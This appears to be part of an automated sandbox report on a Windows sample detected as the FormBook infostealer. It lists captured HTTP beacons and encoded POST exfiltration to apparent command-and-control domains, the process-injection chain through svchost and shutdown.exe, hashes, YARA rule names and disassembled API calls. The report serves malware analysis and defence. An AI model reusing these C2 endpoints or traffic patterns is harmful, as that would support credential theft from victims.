Jan 10, 2025 18:16:30.407361984 CET	741	OUT	POST /9kxb/ HTTP/1.1 Host: www.cifasnc.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cifasnc.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.cifasnc.info/9kxb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 36 4e 52 6d 6c 41 69 47 6a 78 64 76 59 4e 32 6e 36 59 34 5a 75 34 4f 67 6d 75 41 67 47 56 43 78 72 35 55 4c 34 4a 54 6e 61 52 6d 42 4a 51 46 30 43 4d 67 41 56 46 42 6a 4e 79 37 4a 54 4c 4d 63 58 4c 38 32 79 6a 50 61 71 43 4c 31 61 37 74 44 7a 63 73 30 56 77 70 32 4b 77 65 35 6f 35 54 4a 73 42 4d 46 2f 36 5a 39 48 4e 6e 59 59 49 72 4e 6c 61 48 6a 58 72 56 38 4b 52 4c 6b 45 4b 42 73 45 53 30 6b 6d 32 5a 39 46 36 38 43 75 4d 49 49 37 69 72 47 30 73 64 2b 50 38 42 4a 7a 59 71 58 53 2f 50 6e 68 4a 45 4e 76 49 42 37 70 7a 30 63 4d 6d 6b 36 4a 4b 54 4b 37 31 54 6d Data Ascii: SDC=6NRmlAiGjxdvYN2n6Y4Zu4OgmuAgGVCxr5UL4JTnaRmBJQF0CMgAVFBjNy7JTLMcXL82yjPaqCL1a7tDzcs0Vwp2Kwe5o5TJsBMF/6Z9HNnYYIrNlaHjXrV8KRLkEKBsES0km2Z9F68CuMII7irG0sd+P8BJzYqXS/PnhJENvIB7pz0cMmk6JKTK71Tm
Jan 10, 2025 18:16:30.975791931 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:16:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-pingback: http://cifasnc.info/xmlrpc.php expires: Wed, 11 Jan 1984 05:00:00 GMT last-modified: Fri, 10 Jan 2025 17:16:30 GMT cache-control: no-cache, must-revalidate, max-age=0 pragma: no-cache vary: Accept-Encoding,User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gvg9RqHCJDKe0opXcfUmJIfhUoHR5AVtoPJb8STI7P2EDBeZx1Aw5NcZGNotnLDCdDfDDIcyBrK2eh6Ugtie5LOmdAVFyNHGyK245NM3dARmVrU3NAtMSwny9qyfreeL1mXR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe50b48a18c472-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 13 b7 a0 91 a7 Data Ascii: 51eWo6X\|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
Jan 10, 2025 18:16:30.975949049 CET	1151	IN	Data Raw: 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63 af 79 e5 15 cd 21 Data Ascii: DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;\|(a3o)q\|PJ40L&rhVXuDT2 ,!,m0%JM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.10	50022	188.114.96.3	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:32.959580898 CET	765	OUT	POST /9kxb/ HTTP/1.1 Host: www.cifasnc.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cifasnc.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.cifasnc.info/9kxb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 36 4e 52 6d 6c 41 69 47 6a 78 64 76 5a 76 69 6e 39 37 41 5a 2b 6f 4f 68 71 4f 41 67 55 56 43 31 72 35 49 4c 34 4d 72 4e 61 48 57 42 4b 77 56 30 46 49 55 41 59 6c 42 6a 47 53 37 49 64 72 4d 48 58 4c 77 2b 79 68 62 61 71 43 66 31 61 2b 52 44 7a 76 45 33 54 67 70 4f 43 51 65 42 73 35 54 4a 73 42 4d 46 2f 36 38 59 48 4e 50 59 66 34 62 4e 30 4f 54 73 4c 62 56 7a 4e 52 4c 6b 54 61 42 67 45 53 30 47 6d 7a 41 57 46 38 34 43 75 4e 34 49 37 33 48 46 6a 38 64 38 4c 38 41 47 67 61 79 5a 65 36 72 65 6b 61 51 6a 33 72 39 4d 75 53 4a 62 64 33 46 74 61 39 50 45 31 7a 6d 4d 45 30 65 42 4c 77 2f 6b 44 51 48 6f 64 35 2b 51 51 6e 46 48 2b 67 3d 3d Data Ascii: SDC=6NRmlAiGjxdvZvin97AZ+oOhqOAgUVC1r5IL4MrNaHWBKwV0FIUAYlBjGS7IdrMHXLw+yhbaqCf1a+RDzvE3TgpOCQeBs5TJsBMF/68YHNPYf4bN0OTsLbVzNRLkTaBgES0GmzAWF84CuN4I73HFj8d8L8AGgayZe6rekaQj3r9MuSJbd3Fta9PE1zmME0eBLw/kDQHod5+QQnFH+g==
Jan 10, 2025 18:16:33.510116100 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:16:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-pingback: http://cifasnc.info/xmlrpc.php expires: Wed, 11 Jan 1984 05:00:00 GMT last-modified: Fri, 10 Jan 2025 17:16:33 GMT cache-control: no-cache, must-revalidate, max-age=0 pragma: no-cache vary: Accept-Encoding,User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEXwcfIUVhkzWw4ZWfJ6N8bM9%2B%2F8iVd5KBqBwQVXvKbV7rxKtNJgbodiya0%2BnapAEjrwZ4YCH43o08VVJm0CK1sfF%2FWKQg3enmitjvuKPUv4ANgzbbKKGCPd2JzPQh7bC93b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe50c46b8b72b6-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1969&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 Data Ascii: 51eWo6X\|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
Jan 10, 2025 18:16:33.510185003 CET	1159	IN	Data Raw: b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;\|(a3o)q\|PJ40L&rhVXuDT2 ,!,m0%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.10	50023	188.114.96.3	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:35.535732031 CET	1778	OUT	POST /9kxb/ HTTP/1.1 Host: www.cifasnc.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cifasnc.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.cifasnc.info/9kxb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 36 4e 52 6d 6c 41 69 47 6a 78 64 76 5a 76 69 6e 39 37 41 5a 2b 6f 4f 68 71 4f 41 67 55 56 43 31 72 35 49 4c 34 4d 72 4e 61 45 32 42 4a 44 74 30 44 70 55 41 5a 6c 42 6a 4c 79 37 56 64 72 4e 56 58 50 63 36 79 68 48 4b 71 41 6e 31 62 63 70 44 36 36 34 33 64 67 70 4f 64 67 65 36 6f 35 53 64 73 42 64 4f 2f 36 73 59 48 4e 50 59 66 2b 58 4e 6b 71 48 73 4a 62 56 38 4b 52 4c 6f 45 4b 41 39 45 53 73 38 6d 79 52 74 45 4e 45 43 76 74 6f 49 35 42 7a 46 38 4d 64 36 46 63 42 5a 67 61 50 62 65 36 66 38 6b 5a 4e 47 33 6f 74 4d 71 6e 51 73 42 44 5a 5a 44 4c 58 43 36 67 57 4b 4e 51 36 32 52 7a 71 74 49 77 2f 51 47 61 58 43 46 32 67 4e 70 30 43 41 42 36 75 4a 79 4b 41 73 45 65 48 35 33 41 66 78 6c 53 31 77 6a 5a 6d 57 72 35 73 2f 74 42 49 35 45 6c 6f 74 4e 65 36 68 53 57 77 37 69 74 50 58 41 58 73 4e 59 4c 6e 61 64 41 2b 53 68 69 39 72 69 30 74 54 79 49 54 75 53 6a 68 68 59 75 47 38 64 53 7a 48 42 68 4f 68 53 6d 72 64 36 49 44 41 51 6e 53 39 70 35 59 73 76 42 55 71 71 37 44 77 50 7a 70 47 2b 7a 65 77 67 79 [TRUNCATED] Data Ascii: SDC=6NRmlAiGjxdvZvin97AZ+oOhqOAgUVC1r5IL4MrNaE2BJDt0DpUAZlBjLy7VdrNVXPc6yhHKqAn1bcpD6643dgpOdge6o5SdsBdO/6sYHNPYf+XNkqHsJbV8KRLoEKA9ESs8myRtENECvtoI5BzF8Md6FcBZgaPbe6f8kZNG3otMqnQsBDZZDLXC6gWKNQ62RzqtIw/QGaXCF2gNp0CAB6uJyKAsEeH53AfxlS1wjZmWr5s/tBI5ElotNe6hSWw7itPXAXsNYLnadA+Shi9ri0tTyITuSjhhYuG8dSzHBhOhSmrd6IDAQnS9p5YsvBUqq7DwPzpG+zewgyZf1bxfw22bVXOwWQg0uTG9v+BrtfpHRuLUdbGCQjwPs9qMY7ophuro6gBSbIatQORgRbex2lkffQcVGZJu4QZmBX2rEmEar21JMNytZltRgHHfpeJXYRBuXIgAhsJJoFeUA9ztL3cEyyVRFKxgnir7RL/w/32rqT1qh7GNdDIsdFgWED2Ictjo7fyyOTqF6h+xyN1LNH82rDKbSWMjzWyijROS4oUUEie/cz3fLHcRDfDBFBpal3V+/x9X6d2gfIRp2U6/2OWwfP3BZrNxZIXkYLqCFemaaW11u/svBGhchzxfZfXsw2oKddAOejWrcxru2it6xmQnw7vCKriBjrAGrhls8EB8D3Wl2Fsn8SMpUTWwBMJfdrrpz+wCjvmqJLlwK75+BNb6/9GE8aSDYQlHfCP3j+cIZVZz67Caiu6tY+Qnwf8rT6iRB4cqLS9WAg/72SY6j+rV+P7tYf2w6hiDUUPMet9nKDfqU2JOvbCf7Mu59U4eLh2GvyYCvj1IkiYwhemB81TeE6qVpJhGmzACkbeptItTjgkurLrmpZ3/ZceU09y1+swzzULxA7dtbTMukOcgNaRfzkVyAtGIBbkHcgJn2a4liPpl0mPDk5XvRJgPCUkh5KX/EGfLnPqNe2Nz4v7npj/MULUCGbJagOHWiMTOGymHYZeY [TRUNCATED]
Jan 10, 2025 18:16:36.091031075 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-pingback: http://cifasnc.info/xmlrpc.php expires: Wed, 11 Jan 1984 05:00:00 GMT last-modified: Fri, 10 Jan 2025 17:16:36 GMT cache-control: no-cache, must-revalidate, max-age=0 pragma: no-cache vary: Accept-Encoding,User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjXFDcGMehproxb1TFCnnOeNpZb4NF%2F4xlpsirftByaNJHH0SLKYtmzdBo8RdILo%2B5xi7CDbBKqqCA5pBbdxppjCitf8S1fbItRdrRIBUmCN2pEtNa%2Ferk9nnED5352%2BJfBk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe50d47d0d7cff-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c Data Ascii: 512Wo6X\|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
Jan 10, 2025 18:16:36.091054916 CET	1144	IN	Data Raw: e2 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;\|(a3o)q\|PJ40L&rhVXuDT2 ,!,m0
Jan 10, 2025 18:16:36.094003916 CET	22	IN	Data Raw: 63 0d 0a e3 e5 02 00 52 23 03 30 88 0e 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: cR#00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.10	50024	188.114.96.3	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:38.079073906 CET	476	OUT	GET /9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P HTTP/1.1 Host: www.cifasnc.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:16:38.675014019 CET	1217	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 17:16:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-pingback: http://cifasnc.info/xmlrpc.php expires: Wed, 11 Jan 1984 05:00:00 GMT last-modified: Fri, 10 Jan 2025 17:16:38 GMT cache-control: no-cache, must-revalidate, max-age=0 pragma: no-cache location: http://cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exm9lSI6jMUDn9pVv9taWYlVTbW%2Fhp8aIRSj0H9NGKX6SCTUo6emlPsqeK09lQxWe7FMI%2BpyRut9cH8yDJku%2BNjZs3dIkJg92cjAXV3aGmsl%2Fz3V%2ByQSrFGKCRoPVP0Hgylf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe50e47a2d4270-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1726&rtt_var=863&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=476&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.10	50025	3.33.130.190	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:46.820657015 CET	484	OUT	GET /kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P HTTP/1.1 Host: www.champs-cloud.systems Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Target ID:	0
Start time:	12:12:42
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\KcSzB2IpP5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KcSzB2IpP5.exe"
Imagebase:	0x460000
File size:	1'262'080 bytes
MD5 hash:	87FC5E4DD52D2188DA6023BC6A6B8EBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:12:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KcSzB2IpP5.exe"
Imagebase:	0xf10000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1482212976.0000000000EA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1481529737.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1483094484.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:12:52
Start date:	10/01/2025
Path:	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe"
Imagebase:	0x290000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3783040936.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:12:53
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\shutdown.exe"
Imagebase:	0x1c0000
File size:	23'552 bytes
MD5 hash:	FCDE5AF99B82AE6137FB90C7571D40C3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3783203591.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3783026458.0000000002870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3777177232.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:13:07
Start date:	10/01/2025
Path:	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe"
Imagebase:	0x290000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:13:20
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	5.2%
Total number of Nodes:	1829
Total number of Limit Nodes:	52

Executed Functions

Function 004642DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0046430D

Part of subcall function 00466B57: _wcslen.LIBCMT ref: 00466B6A

GetCurrentProcess.KERNEL32(?,004FCB64,00000000,?,?), ref: 00464422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00464429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00464454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00464466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00464474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0046447B
GetSystemInfo.KERNEL32(?,?,?), ref: 004644A0

Strings

kernel32.dll, xrefs: 0046444F
|O, xrefs: 004A36F8
GetNativeSystemInfo, xrefs: 00464460

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: fac038d262b10775fa12cbef02d54605de6e3f2132a4182049e9d8b625a237e9
Instruction ID: cb720bf63249b701b174d09782aedcfad3a953f2a2ca053f9b0793152587838e
Opcode Fuzzy Hash: fac038d262b10775fa12cbef02d54605de6e3f2132a4182049e9d8b625a237e9
Instruction Fuzzy Hash: 1CA1B96590AAD0DFCB11CB797D811E57FE46B76740B148CAAE04193B21E638450DEB2F

Function 004642A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004650AA,?,?,00000000,00000000), ref: 004642B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004650AA,?,?,00000000,00000000), ref: 004642C9
LoadResource.KERNEL32(?,00000000,?,?,004650AA,?,?,00000000,00000000,?,?,?,?,?,?,00464F20), ref: 004A35BE
SizeofResource.KERNEL32(?,00000000,?,?,004650AA,?,?,00000000,00000000,?,?,?,?,?,?,00464F20), ref: 004A35D3
LockResource.KERNEL32(004650AA,?,?,004650AA,?,?,00000000,00000000,?,?,?,?,?,?,00464F20,?), ref: 004A35E6

Strings

SCRIPT, xrefs: 004642BF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
